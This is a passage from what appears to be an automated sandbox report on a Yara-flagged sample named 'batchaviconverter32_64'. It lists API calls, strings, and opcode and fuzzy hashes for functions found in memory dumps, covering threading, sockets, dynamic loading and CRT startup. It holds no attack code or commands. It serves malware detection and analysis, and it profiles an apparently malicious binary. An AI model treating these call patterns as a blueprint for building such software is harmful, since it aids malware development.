                                                              • Opcode Fuzzy Hash: 7310d9a0b3a439e7fab727e77d00eef560d59da6dbc7512709cb7a42504b8344
                                                              • Instruction Fuzzy Hash: BF31ADB1908741AFD310EF25D988B6ABBE8FB48724F104A2EF95582780D770EC04CFA5
                                                              APIs
                                                              • __init_pointers.LIBCMT ref: 02D95CC4
                                                                • Part of subcall function 02D98432: RtlEncodePointer.NTDLL(00000000), ref: 02D98435
                                                                • Part of subcall function 02D98432: __initp_misc_winsig.LIBCMT ref: 02D98450
                                                                • Part of subcall function 02D98432: GetModuleHandleW.KERNEL32(kernel32.dll,?,02DB1588,00000008,00000003,02DB0F6C,?,00000001), ref: 02D991B1
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 02D991C5
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 02D991D8
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 02D991EB
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 02D991FE
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 02D99211
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 02D99224
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 02D99237
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 02D9924A
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 02D9925D
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 02D99270
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 02D99283
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 02D99296
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 02D992A9
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 02D992BC
                                                                • Part of subcall function 02D98432: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 02D992CF
                                                              • __mtinitlocks.LIBCMT ref: 02D95CC9
                                                              • __mtterm.LIBCMT ref: 02D95CD2
                                                                • Part of subcall function 02D95D3A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 02D98868
                                                                • Part of subcall function 02D95D3A: _free.LIBCMT ref: 02D9886F
                                                                • Part of subcall function 02D95D3A: RtlDeleteCriticalSection.NTDLL(02DB3978), ref: 02D98891
                                                              • __calloc_crt.LIBCMT ref: 02D95CF7
                                                              • __initptd.LIBCMT ref: 02D95D19
                                                              • GetCurrentThreadId.KERNEL32 ref: 02D95D20
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                              • String ID:
                                                              • API String ID: 3567560977-0
                                                              • Opcode ID: 89a5fc9a099fe5c43fa10c29158bf464299dffe5dd8d3371fe477b891f7143e9
                                                              • Instruction ID: 4e51cbc95bf417143ec57bdef0f339298085e1e77a9ccab8beeeaaacf331df3a
                                                              • Opcode Fuzzy Hash: 89a5fc9a099fe5c43fa10c29158bf464299dffe5dd8d3371fe477b891f7143e9
                                                              • Instruction Fuzzy Hash: D8F0C2326583115AEF2636787C0968A2786DB02738F600A39F064D53C4FF219C009974
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 02D9340B
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D93412
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02D9341E
                                                              • RtlDecodePointer.NTDLL(00000001), ref: 02D9343B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoInitialize$combase.dll
                                                              • API String ID: 3489934621-340411864
                                                              • Opcode ID: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                              • Instruction ID: a77177e8b96dc732a550562d7ed5cd4b25718588d233bf74f2210c60a0b78bc5
                                                              • Opcode Fuzzy Hash: 1a3d3840d691950f94dfe44d0c7f3b05f2ef2b323010e99306e14387669adcbb
                                                              • Instruction Fuzzy Hash: 21E0E570ED0300EAFB211B72EC59F1A77B9BB05B43F605860B402D1384DBB59C689F50
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,02D933E0), ref: 02D934E0
                                                              • GetProcAddress.KERNEL32(00000000), ref: 02D934E7
                                                              • RtlEncodePointer.NTDLL(00000000), ref: 02D934F2
                                                              • RtlDecodePointer.NTDLL(02D933E0), ref: 02D9350D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                              • String ID: RoUninitialize$combase.dll
                                                              • API String ID: 3489934621-2819208100
                                                              • Opcode ID: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                              • Instruction ID: 7ca71a9c29f3be23ee1a70be877f2443a16168f0fcdc04c7c0c9a5f331b5d43b
                                                              • Opcode Fuzzy Hash: 8429c219d4f8cb0fee22ffab1a49637c00a9490868cf183031f5faadc24bb893
                                                              • Instruction Fuzzy Hash: 49E07EB1E90300EAEB615B61EC29F0A7BB9F704B06F201854F906E1384DBB89D249A54
                                                              APIs
                                                              • TlsGetValue.KERNEL32(FFFFFFFF,29E2DDE5,?,?,?,?,00000000,02DA69F8,000000FF,02D920FA), ref: 02D91E9A
                                                              • TlsSetValue.KERNEL32(FFFFFFFF,02D920FA,?,?,00000000), ref: 02D91F07
                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D91F31
                                                              • HeapFree.KERNEL32(00000000), ref: 02D91F34
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HeapValue$FreeProcess
                                                              • String ID:
                                                              • API String ID: 1812714009-0
                                                              • Opcode ID: 8631272467212d00f66db33c924aca8b4a5f05ed9f10b3ed76c69d6f2246ae9b
                                                              • Instruction ID: 37a1ef9ce73bfe7c5cb0e0e2f6f8822714ea439d9dc941dd2f86cc4f1bfef732
                                                              • Opcode Fuzzy Hash: 8631272467212d00f66db33c924aca8b4a5f05ed9f10b3ed76c69d6f2246ae9b
                                                              • Instruction Fuzzy Hash: 6E519B36A0424A9FDB20DF69C848F2ABBE4FB45664F198659F86D973C0D770EC00CB91
                                                              APIs
                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 02DA56D0
                                                              • __FindPESection.LIBCMT ref: 02DA56EA
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                              • String ID:
                                                              • API String ID: 876702719-0
                                                              • Opcode ID: 7c3a1e81178abd8810151fa5bb6fcb68013beb665368f14d3c604cee24742e5e
                                                              • Instruction ID: ff37c662a92e73852631a51f1ac9bdd21e0091880570ed85cdaa34b78ef4d86c
                                                              • Opcode Fuzzy Hash: 7c3a1e81178abd8810151fa5bb6fcb68013beb665368f14d3c604cee24742e5e
                                                              • Instruction Fuzzy Hash: AFA19076E00215CFDB25CF28E9A0BADB7A5FB44324F984669D855AB340E731EC01CB90
                                                              APIs
                                                              • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B63
                                                              • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405B7D
                                                              • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BB1
                                                              • MultiByteToWideChar.KERNEL32(004051A5,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,004051A5,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BE9
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C3F
                                                              • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405C51
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: StringType$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 3852931651-0
                                                              • Opcode ID: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                              • Instruction ID: b73683cf29d179dc30ac0dacbc12c8afa3e963ef4805c6be7b54428ebd0f8a91
                                                              • Opcode Fuzzy Hash: d4209c6b3d3c9ca3d0b98124627720af5477d93fa3c81dc5f6dd6a722f71754a
                                                              • Instruction Fuzzy Hash: 1E417B71500609EFDF219F94DD86AAF7F79EB05750F10443AFA12B6290C339A960CBA9
                                                              APIs
                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02D81CB1
                                                              • CloseHandle.KERNEL32(?), ref: 02D81CBA
                                                              • InterlockedExchangeAdd.KERNEL32(02DB7244,00000000), ref: 02D81CC6
                                                              • TerminateThread.KERNEL32(?,00000000), ref: 02D81CD4
                                                              • QueueUserAPC.KERNEL32(02D81E7C,?,00000000), ref: 02D81CE1
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02D81CEC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                              • String ID:
                                                              • API String ID: 1946104331-0
                                                              • Opcode ID: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                              • Instruction ID: 444e0c08a3edf9ccedb0f5df00490278d12f65bf01c3b529c15427105228a372
                                                              • Opcode Fuzzy Hash: 4d5876e98fb8dea35c45e696ab97d3777ed8b7c8ca6de067d7351432dc7e647d
                                                              • Instruction Fuzzy Hash: 8EF04432940214BFE7105B96ED0ED5BFBBCEB85721B104A5DF66A82390DB709D14CB64
                                                              APIs
                                                                • Part of subcall function 02D89A0B: __EH_prolog.LIBCMT ref: 02D89A10
                                                                • Part of subcall function 02D89A0B: _Allocate.LIBCPMT ref: 02D89A67
                                                                • Part of subcall function 02D89A0B: _memmove.LIBCMT ref: 02D89ABE
                                                              • _memset.LIBCMT ref: 02D90869
                                                              • FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02D908D2
                                                              • GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02D908DA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateErrorFormatH_prologLastMessage_memmove_memset
                                                              • String ID: Unknown error$invalid string position
                                                              • API String ID: 1854462395-1837348584
                                                              • Opcode ID: e13f668d4f9f7bad4d29535000be68f3307b971f34ad0a5c44839a26944ba5d3
                                                              • Instruction ID: ee4fd50d547342bcfa77f73db29cc84e385690bd9c420c23bccd0ec2eb16aab7
                                                              • Opcode Fuzzy Hash: e13f668d4f9f7bad4d29535000be68f3307b971f34ad0a5c44839a26944ba5d3
                                                              • Instruction Fuzzy Hash: 84519A70608341EFEB14DF25C890B2EBBE5EB98709F54092DF48297791D771E948CBA2
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82BE4
                                                              • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02D82C07
                                                                • Part of subcall function 02D8A43B: WSAGetLastError.WS2_32(00000000,?,?,02D82A51), ref: 02D8A449
                                                              • WSASetLastError.WS2_32 ref: 02D82CD3
                                                              • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02D82CE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast$Recvselect
                                                              • String ID: 3'
                                                              • API String ID: 886190287-280543908
                                                              • Opcode ID: 8e92bb30089ab221dd6b7ccf3262456599784acacb9c27b1a9a84ecdef239fd6
                                                              • Instruction ID: c7b0900eae56fff3b1c28b8541c499ccd3df6bb6e50bead2337fdf471b1c1ab5
                                                              • Opcode Fuzzy Hash: 8e92bb30089ab221dd6b7ccf3262456599784acacb9c27b1a9a84ecdef239fd6
                                                              • Instruction Fuzzy Hash: A4415CB19093419FDB10AF64D408BABBBE9EF84755F10491EE8D987380EB70DD45CBA2
                                                              APIs
                                                              • GetVersionExA.KERNEL32 ref: 004038C7
                                                              • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004038FC
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040395C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentFileModuleNameVariableVersion
                                                              • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                              • API String ID: 1385375860-4131005785
                                                              • Opcode ID: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                              • Instruction ID: dfbe321087950a958f1f5ebe55e663b38e75b845a74228cdfb1d658b51cb0ff2
                                                              • Opcode Fuzzy Hash: 476567a857e94c6b60ab0a2bb3643b3ab9519d2bf8b3118ed803bebf3e2b5968
                                                              • Instruction Fuzzy Hash: A53127B29052446DEB319A705C46BDF3F6C9B02305F2400FBD185F52C2D2B99F85CB18
                                                              APIs
                                                              • std::exception::exception.LIBCMT ref: 02D918AF
                                                                • Part of subcall function 02D92403: std::exception::_Copy_str.LIBCMT ref: 02D9241C
                                                                • Part of subcall function 02D90C80: __CxxThrowException@8.LIBCMT ref: 02D90CDE
                                                              • std::exception::exception.LIBCMT ref: 02D9190E
                                                              Strings
                                                              • boost unique_lock owns already the mutex, xrefs: 02D918FD
                                                              • $, xrefs: 02D91913
                                                              • boost unique_lock has no mutex, xrefs: 02D9189E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                                                              • String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
                                                              • API String ID: 2140441600-46888669
                                                              • Opcode ID: 5e6cb96de3b0781220d006198e361d42add2b0a027fa776d38ff22a0840a20b1
                                                              • Instruction ID: afdcbb08412c3f5126371492b63b499f22b6ed7c66c54f39281566ba8085c1f6
                                                              • Opcode Fuzzy Hash: 5e6cb96de3b0781220d006198e361d42add2b0a027fa776d38ff22a0840a20b1
                                                              • Instruction Fuzzy Hash: AE21D3B15083809FDB50DF24C554B5BBBE5BB89708F508A5EF8A587380D7B5D808CF96
                                                              APIs
                                                              • __getptd_noexit.LIBCMT ref: 02D949B0
                                                                • Part of subcall function 02D95BA2: GetLastError.KERNEL32(75920A60,7591F550,02D95D90,02D92F63,7591F550,?,02D8606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02D86504), ref: 02D95BA4
                                                                • Part of subcall function 02D95BA2: __calloc_crt.LIBCMT ref: 02D95BC5
                                                                • Part of subcall function 02D95BA2: __initptd.LIBCMT ref: 02D95BE7
                                                                • Part of subcall function 02D95BA2: GetCurrentThreadId.KERNEL32 ref: 02D95BEE
                                                                • Part of subcall function 02D95BA2: SetLastError.KERNEL32(00000000,02D8606D,00000104,75920A60,7591F550,ntdll.dll,?,?,?,02D86504), ref: 02D95C06
                                                              • __calloc_crt.LIBCMT ref: 02D949D3
                                                              • __get_sys_err_msg.LIBCMT ref: 02D949F1
                                                              • __invoke_watson.LIBCMT ref: 02D94A0E
                                                              Strings
                                                              • Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02D949BB, 02D949E1
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
                                                              • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                                                              • API String ID: 109275364-798102604
                                                              • Opcode ID: aead267925576d7359b1a096fd03f8c644d08b5af813431e472057a3bb1c8570
                                                              • Instruction ID: ee40a7b43f06660ca1292261517f86c0a3284ddd01f430a366d145d8775c11ad
                                                              • Opcode Fuzzy Hash: aead267925576d7359b1a096fd03f8c644d08b5af813431e472057a3bb1c8570
                                                              • Instruction Fuzzy Hash: A4F0E9366047147FEF22A65B5C41A2B72CDEB41BA4F00052AFD85D6302E721DD0286A5
                                                              APIs
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                              • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                              • GetLastError.KERNEL32 ref: 02D8237A
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID: pqcs
                                                              • API String ID: 1619523792-2559862021
                                                              • Opcode ID: 4dbf7d877c3fa30827740e7450db22bd2813639bd42bc25ef447f0b2ad5f44a8
                                                              • Instruction ID: bd36734b18f9523825667d96fd11a521e258fef8aee38e37d32e4cd7440092c2
                                                              • Opcode Fuzzy Hash: 4dbf7d877c3fa30827740e7450db22bd2813639bd42bc25ef447f0b2ad5f44a8
                                                              • Instruction Fuzzy Hash: DEF0BD71940304ABEB10AAB4D819FAFB7BCEB45701F104569E949D2240E770DD148BA5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D84035
                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 02D84042
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02D84049
                                                              • std::exception::exception.LIBCMT ref: 02D84063
                                                                • Part of subcall function 02D8A5FC: __EH_prolog.LIBCMT ref: 02D8A601
                                                                • Part of subcall function 02D8A5FC: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A610
                                                                • Part of subcall function 02D8A5FC: __CxxThrowException@8.LIBCMT ref: 02D8A62F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 3112922283-2104205924
                                                              • Opcode ID: 0b2dd333b3dcfe307265fb21cc6c2729e96b86946b2612435f326a52212cc303
                                                              • Instruction ID: 979f1202fcc41505085bfa89b1d6d78b5a65f1913d499b5a41a8dcde4efe56c9
                                                              • Opcode Fuzzy Hash: 0b2dd333b3dcfe307265fb21cc6c2729e96b86946b2612435f326a52212cc303
                                                              • Instruction Fuzzy Hash: 44F012B2D44209EBDB00EFE0D919FAFB779FB04301F504555E915A2340D7755A14CF65
                                                              APIs
                                                              • GetStartupInfoA.KERNEL32(?), ref: 00403729
                                                              • GetFileType.KERNEL32(00000800), ref: 004037CF
                                                              • GetStdHandle.KERNEL32(-000000F6), ref: 00403828
                                                              • GetFileType.KERNEL32(00000000), ref: 00403836
                                                              • SetHandleCount.KERNEL32 ref: 0040386D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType$CountInfoStartup
                                                              • String ID:
                                                              • API String ID: 1710529072-0
                                                              • Opcode ID: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                              • Instruction ID: 340931fb5571d0dd89e9413526c141aa1936fc067e7847d678db743c6b9c99aa
                                                              • Opcode Fuzzy Hash: 1ce75c326bde2c2d02afe177aeb4995e441bbd179d01f1070c3041f2ee44749b
                                                              • Instruction Fuzzy Hash: A65136B25003508BD7209F28CD48B563FE8EB01336F19C67AE492EB2E1C738C955C75A
                                                              APIs
                                                                • Part of subcall function 02D91980: CloseHandle.KERNEL32(00000000,29E2DDE5), ref: 02D919D1
                                                                • Part of subcall function 02D91980: WaitForSingleObject.KERNEL32(?,000000FF,29E2DDE5,?,?,?,?,29E2DDE5,02D91953,29E2DDE5), ref: 02D919E8
                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C4E
                                                              • ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02D91C6E
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02D91CA7
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02D91CFB
                                                              • SetEvent.KERNEL32(?), ref: 02D91D02
                                                                • Part of subcall function 02D8418C: CloseHandle.KERNEL32(00000000,?,02D91C35), ref: 02D841B0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
                                                              • String ID:
                                                              • API String ID: 4166353394-0
                                                              • Opcode ID: fd3425c2097f602f6c2d96ef4d649a1f5846eda2b55b99f5a8767898373e1a76
                                                              • Instruction ID: 0364cfb9c5dacf6920dee3252a2bb5db8bf702d9506b5bb9cb002a82cc7677ce
                                                              • Opcode Fuzzy Hash: fd3425c2097f602f6c2d96ef4d649a1f5846eda2b55b99f5a8767898373e1a76
                                                              • Instruction Fuzzy Hash: 5241BC71A013029BEF259F28DC80B2AB7A4EF45725F1406A8FC19EB395D735DC11CBA5
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8E02F
                                                                • Part of subcall function 02D81A01: TlsGetValue.KERNEL32 ref: 02D81A0A
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8E0AE
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D8E0CA
                                                              • InterlockedIncrement.KERNEL32(02DB5180), ref: 02D8E0EF
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D8E104
                                                                • Part of subcall function 02D827F3: SetWaitableTimer.KERNEL32(00000000,?,000493E0,00000000,00000000,00000000,00000000,00000000,0000000A,00000000), ref: 02D8284E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInterlockedSection$EnterExchangeH_prologIncrementLeaveTimerValueWaitable
                                                              • String ID:
                                                              • API String ID: 1578506061-0
                                                              • Opcode ID: f92efe1083cbe2b826f4277ab4d77bdd6178c19008db69612abe4c07a2b16b5a
                                                              • Instruction ID: d2611051b7fb5ed18e3c6730a3a0f130791aff1fd81e9dfde6be1742c037b922
                                                              • Opcode Fuzzy Hash: f92efe1083cbe2b826f4277ab4d77bdd6178c19008db69612abe4c07a2b16b5a
                                                              • Instruction Fuzzy Hash: 543116B1D052059FDB10EFA9D544AAEBBF8FF08310F14495AE849D7740E775AA04CFA0
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82A3B
                                                              • closesocket.WS2_32 ref: 02D82A42
                                                              • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02D82A89
                                                              • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02D82A97
                                                              • closesocket.WS2_32 ref: 02D82A9E
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastclosesocket$ioctlsocket
                                                              • String ID:
                                                              • API String ID: 1561005644-0
                                                              • Opcode ID: f8b43a1b1104fe7db6572917ae975bd8e9823b80ab71291453f95e02bc61b870
                                                              • Instruction ID: ec47630055d2ae4b2408a6e83cb80cec642b23b2a11012b964775bf971bf03bc
                                                              • Opcode Fuzzy Hash: f8b43a1b1104fe7db6572917ae975bd8e9823b80ab71291453f95e02bc61b870
                                                              • Instruction Fuzzy Hash: 962106B5A04245ABEB20BBB8984CB6EB7E9DF44315F11456AEC06D3380EB70CD41CBA1
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D81BAC
                                                              • RtlEnterCriticalSection.NTDLL ref: 02D81BBC
                                                              • RtlLeaveCriticalSection.NTDLL ref: 02D81BEA
                                                              • RtlEnterCriticalSection.NTDLL ref: 02D81C13
                                                              • RtlLeaveCriticalSection.NTDLL ref: 02D81C56
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
